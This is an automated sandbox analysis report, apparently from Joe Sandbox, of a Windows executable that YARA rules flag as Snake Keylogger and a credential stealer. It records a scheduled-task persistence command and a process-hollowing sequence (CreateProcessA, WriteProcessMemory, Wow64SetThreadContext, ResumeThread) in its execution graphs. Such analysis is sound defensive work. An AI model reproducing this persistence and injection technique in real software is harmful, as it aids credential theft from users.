                                            Start date:24/07/2024
                                            Path:C:\Users\user\Desktop\rPO0977-6745.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\rPO0977-6745.exe"
                                            Imagebase:0x20000
                                            File size:561'664 bytes
                                            MD5 hash:978148253C4B65B751FCD3CB4713F614
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:09:08:17
                                            Start date:24/07/2024
                                            Path:C:\Users\user\Desktop\rPO0977-6745.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\rPO0977-6745.exe"
                                            Imagebase:0xb60000
                                            File size:561'664 bytes
                                            MD5 hash:978148253C4B65B751FCD3CB4713F614
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Target ID:11
                                            Start time:09:08:18
                                            Start date:24/07/2024
                                            Path:C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            Imagebase:0x690000
                                            File size:561'664 bytes
                                            MD5 hash:978148253C4B65B751FCD3CB4713F614
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 45%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:12
                                            Start time:09:08:19
                                            Start date:24/07/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff7fb730000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:21
                                            Start time:09:08:21
                                            Start date:24/07/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
                                            Imagebase:0xbe0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:22
                                            Start time:09:08:21
                                            Start date:24/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:23
                                            Start time:09:08:21
                                            Start date:24/07/2024
                                            Path:C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
                                            Imagebase:0x490000
                                            File size:561'664 bytes
                                            MD5 hash:978148253C4B65B751FCD3CB4713F614
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:10.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:3.7%
                                              Total number of Nodes:162
                                              Total number of Limit Nodes:11
                                              execution_graph 23063 8d15007 23064 8d14fb7 23063->23064 23065 8d14f8f 23063->23065 23068 8d18f80 23064->23068 23083 8d18f70 23064->23083 23069 8d18f9a 23068->23069 23070 8d18fbe 23069->23070 23098 8d19934 23069->23098 23103 8d19370 23069->23103 23109 8d19e0d 23069->23109 23113 8d194ca 23069->23113 23119 8d19626 23069->23119 23123 8d196c4 23069->23123 23129 8d19260 23069->23129 23135 8d198c0 23069->23135 23140 8d19a00 23069->23140 23144 8d194da 23069->23144 23148 8d196f8 23069->23148 23153 8d19679 23069->23153 23070->23065 23084 8d18f9a 23083->23084 23085 8d18fbe 23084->23085 23086 8d19370 2 API calls 23084->23086 23087 8d19934 2 API calls 23084->23087 23088 8d19679 2 API calls 23084->23088 23089 8d196f8 2 API calls 23084->23089 23090 8d194da 2 API calls 23084->23090 23091 8d19a00 2 API calls 23084->23091 23092 8d198c0 2 API calls 23084->23092 23093 8d19260 2 API calls 23084->23093 23094 8d196c4 4 API calls 23084->23094 23095 8d19626 2 API calls 23084->23095 23096 8d194ca 2 API calls 23084->23096 23097 8d19e0d 2 API calls 23084->23097 23085->23065 23086->23085 23087->23085 23088->23085 23089->23085 23090->23085 23091->23085 23092->23085 23093->23085 23094->23085 23095->23085 23096->23085 23097->23085 23099 8d19aa1 23098->23099 23158 8d148a0 23099->23158 23162 8d14898 23099->23162 23100 8d19ac5 23104 8d1938e 23103->23104 23105 8d19379 23103->23105 23104->23070 23105->23104 23166 8d14b28 23105->23166 23170 8d14b1d 23105->23170 23110 8d19d9c 23109->23110 23110->23109 23111 8d148a0 WriteProcessMemory 23110->23111 23112 8d14898 WriteProcessMemory 23110->23112 23111->23110 23112->23110 23114 8d194d3 23113->23114 23116 8d194b2 23113->23116 23117 8d148a0 WriteProcessMemory 23114->23117 23118 8d14898 WriteProcessMemory 23114->23118 23115 8d19ac5 23116->23070 23117->23115 23118->23115 23174 8d14990 23119->23174 23178 8d14989 23119->23178 23120 8d1965a 23120->23070 23182 8d147e0 23123->23182 23186 8d147d8 23123->23186 23124 8d196e2 23125 8d148a0 WriteProcessMemory 23124->23125 23126 8d14898 WriteProcessMemory 23124->23126 23125->23124 23126->23124 23131 8d192a3 23129->23131 23130 8d1938e 23130->23070 23131->23130 23133 8d14b28 CreateProcessA 23131->23133 23134 8d14b1d CreateProcessA 23131->23134 23132 8d19487 23132->23070 23133->23132 23134->23132 23136 8d19690 23135->23136 23136->23135 23137 8d19e00 23136->23137 23190 8d14220 23136->23190 23194 8d14218 23136->23194 23137->23070 23198 8d14700 23140->23198 23202 8d14708 23140->23202 23141 8d19a1a 23146 8d148a0 WriteProcessMemory 23144->23146 23147 8d14898 WriteProcessMemory 23144->23147 23145 8d19508 23145->23070 23146->23145 23147->23145 23149 8d19b02 23148->23149 23151 8d14700 Wow64SetThreadContext 23149->23151 23152 8d14708 Wow64SetThreadContext 23149->23152 23150 8d19b1d 23150->23070 23151->23150 23152->23150 23154 8d1967f 23153->23154 23155 8d19e00 23154->23155 23156 8d14220 ResumeThread 23154->23156 23157 8d14218 ResumeThread 23154->23157 23155->23070 23156->23154 23157->23154 23159 8d148e8 WriteProcessMemory 23158->23159 23161 8d1493f 23159->23161 23161->23100 23163 8d148e8 WriteProcessMemory 23162->23163 23165 8d1493f 23163->23165 23165->23100 23167 8d14bb1 CreateProcessA 23166->23167 23169 8d14d73 23167->23169 23171 8d14b28 CreateProcessA 23170->23171 23173 8d14d73 23171->23173 23175 8d149db ReadProcessMemory 23174->23175 23177 8d14a1f 23175->23177 23177->23120 23179 8d14990 ReadProcessMemory 23178->23179 23181 8d14a1f 23179->23181 23181->23120 23183 8d14820 VirtualAllocEx 23182->23183 23185 8d1485d 23183->23185 23185->23124 23187 8d14820 VirtualAllocEx 23186->23187 23189 8d1485d 23187->23189 23189->23124 23191 8d14260 ResumeThread 23190->23191 23193 8d14291 23191->23193 23193->23136 23195 8d14220 ResumeThread 23194->23195 23197 8d14291 23195->23197 23197->23136 23199 8d14708 Wow64SetThreadContext 23198->23199 23201 8d14795 23199->23201 23201->23141 23203 8d1474d Wow64SetThreadContext 23202->23203 23205 8d14795 23203->23205 23205->23141 23031 2f7acb0 23035 2f7ad97 23031->23035 23043 2f7ada8 23031->23043 23032 2f7acbf 23036 2f7adb9 23035->23036 23037 2f7addc 23035->23037 23036->23037 23051 2f7b031 23036->23051 23055 2f7b040 23036->23055 23037->23032 23038 2f7add4 23038->23037 23039 2f7afe0 GetModuleHandleW 23038->23039 23040 2f7b00d 23039->23040 23040->23032 23044 2f7adb9 23043->23044 23045 2f7addc 23043->23045 23044->23045 23049 2f7b031 LoadLibraryExW 23044->23049 23050 2f7b040 LoadLibraryExW 23044->23050 23045->23032 23046 2f7add4 23046->23045 23047 2f7afe0 GetModuleHandleW 23046->23047 23048 2f7b00d 23047->23048 23048->23032 23049->23046 23050->23046 23052 2f7b054 23051->23052 23054 2f7b079 23052->23054 23059 2f7a130 23052->23059 23054->23038 23056 2f7b054 23055->23056 23057 2f7a130 LoadLibraryExW 23056->23057 23058 2f7b079 23056->23058 23057->23058 23058->23038 23060 2f7b220 LoadLibraryExW 23059->23060 23062 2f7b299 23060->23062 23062->23054 23234 2f7d690 DuplicateHandle 23235 2f7d726 23234->23235 23236 2f7d040 23237 2f7d086 GetCurrentProcess 23236->23237 23239 2f7d0d1 23237->23239 23240 2f7d0d8 GetCurrentThread 23237->23240 23239->23240 23241 2f7d115 GetCurrentProcess 23240->23241 23242 2f7d10e 23240->23242 23243 2f7d14b 23241->23243 23242->23241 23244 2f7d173 GetCurrentThreadId 23243->23244 23245 2f7d1a4 23244->23245 23206 8d1a148 23207 8d1a2d3 23206->23207 23209 8d1a16e 23206->23209 23209->23207 23210 8d158e4 23209->23210 23211 8d1a3c8 PostMessageW 23210->23211 23212 8d1a434 23211->23212 23212->23209 23213 2f74668 23214 2f7467a 23213->23214 23215 2f74686 23214->23215 23217 2f74779 23214->23217 23218 2f7479d 23217->23218 23222 2f74879 23218->23222 23226 2f74888 23218->23226 23224 2f748af 23222->23224 23223 2f7498c 23223->23223 23224->23223 23230 2f744c4 23224->23230 23228 2f748af 23226->23228 23227 2f7498c 23227->23227 23228->23227 23229 2f744c4 CreateActCtxA 23228->23229 23229->23227 23231 2f75918 CreateActCtxA 23230->23231 23233 2f759db 23231->23233
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb8569d53c0f2dcda254848ebe7480abb1eb288be75bf67faba791fdefbc609d
                                              • Instruction ID: af5c0c476b5350718a3995f10093d4220aff7286d21b3541a0d254f27510f49f
                                              • Opcode Fuzzy Hash: bb8569d53c0f2dcda254848ebe7480abb1eb288be75bf67faba791fdefbc609d
                                              • Instruction Fuzzy Hash: 9F913670D04228EFEB24CF66D8647E9BBB6BF89301F5082EAD44DA7240DB745A85CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 298105cf18095d7d1dd67dd2046d83f42aedb286e53326d1ac3edb608ed15614
                                              • Instruction ID: ac12e560cc39c0a99dde0bc9ba9637c4cd958471fdcceb5f6e490c338be083eb
                                              • Opcode Fuzzy Hash: 298105cf18095d7d1dd67dd2046d83f42aedb286e53326d1ac3edb608ed15614
                                              • Instruction Fuzzy Hash: A4D05E6584D208FACF50DEB5F4212F5BDF8EB0B281F807745C84DA2701D228C9108E20

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 2f7d031-2f7d0cf GetCurrentProcess 298 2f7d0d1-2f7d0d7 294->298 299 2f7d0d8-2f7d10c GetCurrentThread 294->299 298->299 300 2f7d115-2f7d149 GetCurrentProcess 299->300 301 2f7d10e-2f7d114 299->301 303 2f7d152-2f7d16d call 2f7d618 300->303 304 2f7d14b-2f7d151 300->304 301->300 307 2f7d173-2f7d1a2 GetCurrentThreadId 303->307 304->303 308 2f7d1a4-2f7d1aa 307->308 309 2f7d1ab-2f7d20d 307->309 308->309
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 02F7D0BE
                                              • GetCurrentThread.KERNEL32 ref: 02F7D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 02F7D138
                                              • GetCurrentThreadId.KERNEL32 ref: 02F7D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 766244ab174b207fe7004c385b5b005c14fb56b27fdd86b069d400ad4d5e2257
                                              • Instruction ID: 0baccc2d39a8903fa0122b87890c5f898fd6b28c26338a9383a9710c1a6c9c5e
                                              • Opcode Fuzzy Hash: 766244ab174b207fe7004c385b5b005c14fb56b27fdd86b069d400ad4d5e2257
                                              • Instruction Fuzzy Hash: 105145B09003498FEB18DFA9D548B9EBBF1BF8C318F24845AE009A73A0D7755944CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 316 2f7d040-2f7d0cf GetCurrentProcess 320 2f7d0d1-2f7d0d7 316->320 321 2f7d0d8-2f7d10c GetCurrentThread 316->321 320->321 322 2f7d115-2f7d149 GetCurrentProcess 321->322 323 2f7d10e-2f7d114 321->323 325 2f7d152-2f7d16d call 2f7d618 322->325 326 2f7d14b-2f7d151 322->326 323->322 329 2f7d173-2f7d1a2 GetCurrentThreadId 325->329 326->325 330 2f7d1a4-2f7d1aa 329->330 331 2f7d1ab-2f7d20d 329->331 330->331
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 02F7D0BE
                                              • GetCurrentThread.KERNEL32 ref: 02F7D0FB
                                              • GetCurrentProcess.KERNEL32 ref: 02F7D138
                                              • GetCurrentThreadId.KERNEL32 ref: 02F7D191
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: 581a161d995582b215c1d20ed94c62f23d8c3d3328e76090c0822f13073c6c07
                                              • Instruction ID: 3a373705a9069d0199c5ad3746061a3f272230b6cb72dfc9efd3817fb70cdc43
                                              • Opcode Fuzzy Hash: 581a161d995582b215c1d20ed94c62f23d8c3d3328e76090c0822f13073c6c07
                                              • Instruction Fuzzy Hash: BF5156B09003498FEB14DFAAD548B9EBBF1BF8C318F24845AE409A7360D7745944CB66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 361 8d14b1d-8d14bbd 364 8d14bf6-8d14c16 361->364 365 8d14bbf-8d14bc9 361->365 372 8d14c18-8d14c22 364->372 373 8d14c4f-8d14c7e 364->373 365->364 366 8d14bcb-8d14bcd 365->366 367 8d14bf0-8d14bf3 366->367 368 8d14bcf-8d14bd9 366->368 367->364 370 8d14bdb 368->370 371 8d14bdd-8d14bec 368->371 370->371 371->371 374 8d14bee 371->374 372->373 375 8d14c24-8d14c26 372->375 379 8d14c80-8d14c8a 373->379 380 8d14cb7-8d14d71 CreateProcessA 373->380 374->367 377 8d14c49-8d14c4c 375->377 378 8d14c28-8d14c32 375->378 377->373 381 8d14c34 378->381 382 8d14c36-8d14c45 378->382 379->380 383 8d14c8c-8d14c8e 379->383 393 8d14d73-8d14d79 380->393 394 8d14d7a-8d14e00 380->394 381->382 382->382 384 8d14c47 382->384 385 8d14cb1-8d14cb4 383->385 386 8d14c90-8d14c9a 383->386 384->377 385->380 388 8d14c9c 386->388 389 8d14c9e-8d14cad 386->389 388->389 389->389 390 8d14caf 389->390 390->385 393->394 404 8d14e10-8d14e14 394->404 405 8d14e02-8d14e06 394->405 407 8d14e24-8d14e28 404->407 408 8d14e16-8d14e1a 404->408 405->404 406 8d14e08 405->406 406->404 410 8d14e38-8d14e3c 407->410 411 8d14e2a-8d14e2e 407->411 408->407 409 8d14e1c 408->409 409->407 412 8d14e4e-8d14e55 410->412 413 8d14e3e-8d14e44 410->413 411->410 414 8d14e30 411->414 415 8d14e57-8d14e66 412->415 416 8d14e6c 412->416 413->412 414->410 415->416 418 8d14e6d 416->418 418->418
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08D14D5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2fce53d21501df6a7218353a3813a860ac2e9b9965211dcca4f7095b5e672183
                                              • Instruction ID: 732a1d213ff69656648aff773a0644fa3716f6887288246fff63e8767d379d8e
                                              • Opcode Fuzzy Hash: 2fce53d21501df6a7218353a3813a860ac2e9b9965211dcca4f7095b5e672183
                                              • Instruction Fuzzy Hash: 0FA14771D002299FEF24DF68D840BADBBF3BF48355F1482A9E808A7240DB749985CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 419 8d14b28-8d14bbd 421 8d14bf6-8d14c16 419->421 422 8d14bbf-8d14bc9 419->422 429 8d14c18-8d14c22 421->429 430 8d14c4f-8d14c7e 421->430 422->421 423 8d14bcb-8d14bcd 422->423 424 8d14bf0-8d14bf3 423->424 425 8d14bcf-8d14bd9 423->425 424->421 427 8d14bdb 425->427 428 8d14bdd-8d14bec 425->428 427->428 428->428 431 8d14bee 428->431 429->430 432 8d14c24-8d14c26 429->432 436 8d14c80-8d14c8a 430->436 437 8d14cb7-8d14d71 CreateProcessA 430->437 431->424 434 8d14c49-8d14c4c 432->434 435 8d14c28-8d14c32 432->435 434->430 438 8d14c34 435->438 439 8d14c36-8d14c45 435->439 436->437 440 8d14c8c-8d14c8e 436->440 450 8d14d73-8d14d79 437->450 451 8d14d7a-8d14e00 437->451 438->439 439->439 441 8d14c47 439->441 442 8d14cb1-8d14cb4 440->442 443 8d14c90-8d14c9a 440->443 441->434 442->437 445 8d14c9c 443->445 446 8d14c9e-8d14cad 443->446 445->446 446->446 447 8d14caf 446->447 447->442 450->451 461 8d14e10-8d14e14 451->461 462 8d14e02-8d14e06 451->462 464 8d14e24-8d14e28 461->464 465 8d14e16-8d14e1a 461->465 462->461 463 8d14e08 462->463 463->461 467 8d14e38-8d14e3c 464->467 468 8d14e2a-8d14e2e 464->468 465->464 466 8d14e1c 465->466 466->464 469 8d14e4e-8d14e55 467->469 470 8d14e3e-8d14e44 467->470 468->467 471 8d14e30 468->471 472 8d14e57-8d14e66 469->472 473 8d14e6c 469->473 470->469 471->467 472->473 475 8d14e6d 473->475 475->475
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08D14D5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1270197925.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d10000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: edccda6f33146b3e4b04e6348843eabcc7580a4efebd6b6fce2c0fb5b37bee2a
                                              • Instruction ID: 3223ac3a3ee61be7e3d28b0345295b9e7d6d8b2a6a569d976b7cdabff78610bd
                                              • Opcode Fuzzy Hash: edccda6f33146b3e4b04e6348843eabcc7580a4efebd6b6fce2c0fb5b37bee2a
                                              • Instruction Fuzzy Hash: 95914771D002199FEF24DF68D840BADBBF3BF48355F1482A9E808A7280DB749985CF95

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 476 2f7ada8-2f7adb7 477 2f7ade3-2f7ade7 476->477 478 2f7adb9-2f7adc6 call 2f7a0cc 476->478 479 2f7adfb-2f7ae3c 477->479 480 2f7ade9-2f7adf3 477->480 485 2f7addc 478->485 486 2f7adc8 478->486 487 2f7ae3e-2f7ae46 479->487 488 2f7ae49-2f7ae57 479->488 480->479 485->477 531 2f7adce call 2f7b031 486->531 532 2f7adce call 2f7b040 486->532 487->488 489 2f7ae7b-2f7ae7d 488->489 490 2f7ae59-2f7ae5e 488->490 492 2f7ae80-2f7ae87 489->492 493 2f7ae60-2f7ae67 call 2f7a0d8 490->493 494 2f7ae69 490->494 491 2f7add4-2f7add6 491->485 495 2f7af18-2f7afd8 491->495 496 2f7ae94-2f7ae9b 492->496 497 2f7ae89-2f7ae91 492->497 499 2f7ae6b-2f7ae79 493->499 494->499 526 2f7afe0-2f7b00b GetModuleHandleW 495->526 527 2f7afda-2f7afdd 495->527 500 2f7ae9d-2f7aea5 496->500 501 2f7aea8-2f7aeaa call 2f7a0e8 496->501 497->496 499->492 500->501 505 2f7aeaf-2f7aeb1 501->505 507 2f7aeb3-2f7aebb 505->507 508 2f7aebe-2f7aec3 505->508 507->508 509 2f7aec5-2f7aecc 508->509 510 2f7aee1-2f7aeee 508->510 509->510 512 2f7aece-2f7aede call 2f7a0f8 call 2f7a108 509->512 516 2f7af11-2f7af17 510->516 517 2f7aef0-2f7af0e 510->517 512->510 517->516 528 2f7b014-2f7b028 526->528 529 2f7b00d-2f7b013 526->529 527->526 529->528 531->491 532->491
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02F7AFFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 7eb982c3d3a47b650fe37e2e37f742a735d13171ab5b780e15e7559a45b6a3d8
                                              • Instruction ID: f48c91be770643a0c5c28ded975fb66f42b06eaa7977441b5288bae09e1df623
                                              • Opcode Fuzzy Hash: 7eb982c3d3a47b650fe37e2e37f742a735d13171ab5b780e15e7559a45b6a3d8
                                              • Instruction Fuzzy Hash: 41713470A00B058FD724DF2AD54479ABBF2FF88744F008A2ED18AD7A50DB75E949CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 641 2f744c4-2f759d9 CreateActCtxA 644 2f759e2-2f75a3c 641->644 645 2f759db-2f759e1 641->645 652 2f75a3e-2f75a41 644->652 653 2f75a4b-2f75a4f 644->653 645->644 652->653 654 2f75a51-2f75a5d 653->654 655 2f75a60-2f75a90 653->655 654->655 659 2f75a42-2f75a47 655->659 660 2f75a92-2f75b14 655->660 659->653
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: f077b79fb820d168d6c38ebb1fa8d91628265f14ab2d4cda61421fc1198d899e
                                              • Instruction ID: 4d4f41f9addc47079fcc4aade585794890e36a2c211738fed538f9522ec02709
                                              • Opcode Fuzzy Hash: f077b79fb820d168d6c38ebb1fa8d91628265f14ab2d4cda61421fc1198d899e
                                              • Instruction Fuzzy Hash: 3841BFB1C00719CFEB24DFA9C884B9DBBF5BF48304F64806AD508AB251DB756946CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 663 2f7590c-2f759d9 CreateActCtxA 665 2f759e2-2f75a3c 663->665 666 2f759db-2f759e1 663->666 673 2f75a3e-2f75a41 665->673 674 2f75a4b-2f75a4f 665->674 666->665 673->674 675 2f75a51-2f75a5d 674->675 676 2f75a60-2f75a90 674->676 675->676 680 2f75a42-2f75a47 676->680 681 2f75a92-2f75b14 676->681 680->674
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02F759C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1264854905.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2f70000_rPO0977-6745.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: efebcb462f3299378318163d47842045d341fe87584295a14a675c0959d530ad
                                              • Instruction ID: aac5d556da688900d0e9e87325f32f682d699b1107282cdd50a457b43af4246e
                                              • Opcode Fuzzy Hash: efebcb462f3299378318163d47842045d341fe87584295a14a675c0959d530ad
                                              • Instruction Fuzzy Hash: 1D41BFB1C00719CFEB24DFA9C884BDDBBB6BF49304F24806AD808AB251DB755946CF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 684 8d14898-8d148ee 686 8d148f0-8d148fc 684->686 687 8d148fe-8d1493d WriteProcessMemory 684->687 686->687 689 8d14946-8d14976 687->689 690 8d1493f-8d14945 687->690 690->689
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08D14930
                                              Memory Dump Source
